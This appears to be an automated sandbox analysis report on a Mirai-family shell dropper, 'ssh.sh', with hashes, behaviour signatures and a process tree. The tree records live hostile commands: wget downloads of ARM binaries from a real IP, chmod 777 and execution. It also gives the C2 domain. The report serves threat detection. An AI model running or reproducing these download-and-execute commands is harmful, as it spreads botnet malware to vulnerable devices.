Analysis
max time kernel: 150s
max time network: 153s
platform: debian-9_armhf
resource: debian9-armhf-20240611-en
resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 23-11-2024 17:20
Static task
static1
Behavioral task
behavioral1
Sample
ssh.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
ssh.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
ssh.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
ssh.sh
Resource
debian9-mipsel-20240418-en
General
Target: ssh.sh
Size: 639B
MD5: 61f6f361a8641428ec15e652569064b8
SHA1: f3c5b2338ce425c32eec3abd2310ba992bd3ab94
SHA256: ce3ca0522b38c3931522cac2f1218dbc231624674dcc80ce76b4a26ecffdd8f1
SHA512: 0402ef7c2bd4100f3c40ec5d2a60fe1060cd5a42f4762dd398e685db82abd221df7f260be27a3c95394ba7b0665556b2e22f860f23bf6fceda6651e1048471fe
Malware Config
Extracted
mirai
gay.nguyenletriloc.pro
Signatures
- Mirai family
- File and Directory Permissions Modification (1 TTPs, 8 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  Processes (pid | process):
    724 | chmod
    735 | chmod
    745 | chmod
    755 | chmod
    689 | chmod
    704 | chmod
    712 | chmod
    717 | chmod
- Deletes itself (3 IoCs)
  Processes (pid | process):
    691 | main_arm
    705 | main_arm5
    718 | main_arm7
- Executes dropped EXE (8 IoCs)
  Processes (ioc | pid | process):
    /var/tmp/main_arm | 691 | main_arm
    /var/tmp/main_arm5 | 705 | main_arm5
    /var/tmp/main_arm6 | 713 | main_arm6
    /var/tmp/main_arm7 | 718 | main_arm7
    /var/tmp/arm | 725 | arm
    /var/tmp/arm5 | 736 | arm5
    /var/tmp/arm6 | 747 | arm6
    /var/tmp/arm7 | 756 | arm7
- Traces itself (6 IoCs)
  Traces itself to prevent debugging attempts
  Processes (pid | process):
    691 | main_arm
    692 | main_arm
    705 | main_arm5
    706 | main_arm5
    718 | main_arm7
    719 | main_arm7
- Creates a large amount of network flows (1 TTPs)
  This may indicate a network scan to discover remotely running services.
- Changes its process name (3 IoCs)
  Processes (description | ioc | pid | process):
    Changes the process name, possibly in an attempt to hide itself | httpd | 691 | main_arm
    Changes the process name, possibly in an attempt to hide itself | httpd | 705 | main_arm5
    Changes the process name, possibly in an attempt to hide itself | httpd | 718 | main_arm7
Processes
Process tree (image | command line | PID; indented rows are children of /tmp/ssh.sh; signature hits listed beneath the row):
- /tmp/ssh.sh | /tmp/ssh.sh | PID:666
  - /bin/rm | rm -rf main_arm | PID:667
  - /usr/bin/wget | wget http://66.36.234.2/main_arm -O - | PID:673
  - /bin/chmod | chmod 777 main_arm | PID:689
    - File and Directory Permissions Modification
  - /var/tmp/main_arm | ./main_arm avtech | PID:691
    - Deletes itself
    - Executes dropped EXE
    - Traces itself
    - Changes its process name
  - /bin/rm | rm -rf main_arm | PID:693
  - /bin/rm | rm -rf main_arm5 | PID:696
  - /usr/bin/wget | wget http://66.36.234.2/main_arm5 -O - | PID:697
  - /bin/chmod | chmod 777 main_arm5 | PID:704
    - File and Directory Permissions Modification
  - /var/tmp/main_arm5 | ./main_arm5 avtech | PID:705
    - Deletes itself
    - Executes dropped EXE
    - Traces itself
    - Changes its process name
  - /bin/rm | rm -rf main_arm5 | PID:707
  - /bin/rm | rm -rf main_arm6 | PID:709
  - /usr/bin/wget | wget http://66.36.234.2/main_arm6 -O - | PID:710
  - /bin/chmod | chmod 777 main_arm6 | PID:712
    - File and Directory Permissions Modification
  - /var/tmp/main_arm6 | ./main_arm6 avtech | PID:713
    - Executes dropped EXE
  - /bin/rm | rm -rf main_arm6 | PID:714
  - /bin/rm | rm -rf main_arm7 | PID:715
  - /usr/bin/wget | wget http://66.36.234.2/main_arm7 -O - | PID:716
  - /bin/chmod | chmod 777 main_arm7 | PID:717
    - File and Directory Permissions Modification
  - /var/tmp/main_arm7 | ./main_arm7 avtech | PID:718
    - Deletes itself
    - Executes dropped EXE
    - Traces itself
    - Changes its process name
  - /bin/rm | rm -rf main_arm7 | PID:720
  - /bin/rm | rm -rf arm | PID:722
  - /usr/bin/wget | wget http://66.36.234.2/arm -O - | PID:723
  - /bin/chmod | chmod 777 arm | PID:724
    - File and Directory Permissions Modification
  - /var/tmp/arm | ./arm avtech | PID:725
    - Executes dropped EXE
  - /bin/sh | /bin/sh ./arm avtech | PID:725
  - /bin/rm | rm -rf arm | PID:727
  - /bin/rm | rm -rf arm5 | PID:730
  - /usr/bin/wget | wget http://66.36.234.2/arm5 -O - | PID:731
  - /bin/chmod | chmod 777 arm5 | PID:735
    - File and Directory Permissions Modification
  - /var/tmp/arm5 | ./arm5 avtech | PID:736
    - Executes dropped EXE
  - /bin/sh | /bin/sh ./arm5 avtech | PID:736
  - /bin/rm | rm -rf arm5 | PID:739
  - /bin/rm | rm -rf arm6 | PID:740
  - /usr/bin/wget | wget http://66.36.234.2/arm6 -O - | PID:742
  - /bin/chmod | chmod 777 arm6 | PID:745
    - File and Directory Permissions Modification
  - /var/tmp/arm6 | ./arm6 avtech | PID:747
    - Executes dropped EXE
  - /bin/sh | /bin/sh ./arm6 avtech | PID:747
  - /bin/rm | rm -rf arm6 | PID:749
  - /bin/rm | rm -rf arm7 | PID:750
  - /usr/bin/wget | wget http://66.36.234.2/arm7 -O - | PID:752
  - /bin/chmod | chmod 777 arm7 | PID:755
    - File and Directory Permissions Modification
  - /var/tmp/arm7 | ./arm7 avtech | PID:756
    - Executes dropped EXE
  - /bin/sh | /bin/sh ./arm7 avtech | PID:756
  - /bin/rm | rm -rf arm7 | PID:760
  - /bin/rm | rm /tmp/ssh.sh | PID:761
-
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 130KB
  MD5: b5b7f0c68cdf6458e137e7dfb1d74e6f
  SHA1: ceb4700b167cff05ccb77a25260bf696b39b8e63
  SHA256: 6017dc10e1edd004384c5b0033e237a81e293d8668459c107f057fbdc62f771c
  SHA512: acdcee90b0ff85e4ed35ba3ab254065b43645ddc0242f097392f8b49967642a95d393b43e039c84aa5e9c52dbfd5efd27a441162227ac3b9b169226c228a3c3d
- Filesize: 130KB
  MD5: b3d2c1afb1984b43648625b48eb1373e
  SHA1: 3592776c6e0f9e67c38c5a8bfff7da67629b6713
  SHA256: 7066eea40920fc2a9a029276906a8fd8188f501f7c14078116e0523e667687a2
  SHA512: 0f739303ac523d66eb032500f7bfd48bc5fa5f26bac43124a4d2564ae1a5558dfcfae7a70e45907ba7d15a82ae01d507fdd78a97de3050b5a982dcf7a5c3d627
- Filesize: 142KB
  MD5: daa33b1e666b1386b51ff9793150fdff
  SHA1: 999d619976b11ae71e575ced094011f0b95b1905
  SHA256: d47526004f78450ce96e34f8cbb0a77a12d7aa083ff4e497a67ca65130bca32e
  SHA512: c351a078605d2870a643b1822d3fcf412aad81e20a4d1dc6c505f09c64c81881d75feb1c4e6bea60814191bf3b984a2b080a950a1aa29b3cc920affd48be9fa6
- Filesize: 179KB
  MD5: 0523d595f7f8b7b8bf05cb804de5f32f
  SHA1: 5fcd1fb36f56d96c9185ce454613946f7161df4d
  SHA256: 7045550dcae0e634c84ac8729c51c0972de3ec326d6541d48d2fc3fbc8c59093
  SHA512: 079cd6dfe752a3024837909873b6fe029fe5171ec25cd081a39b36652c52f42d75b321e3acd48e37f43f3409f82448a02b94d7eefbfe5a7ccbd73e131290439b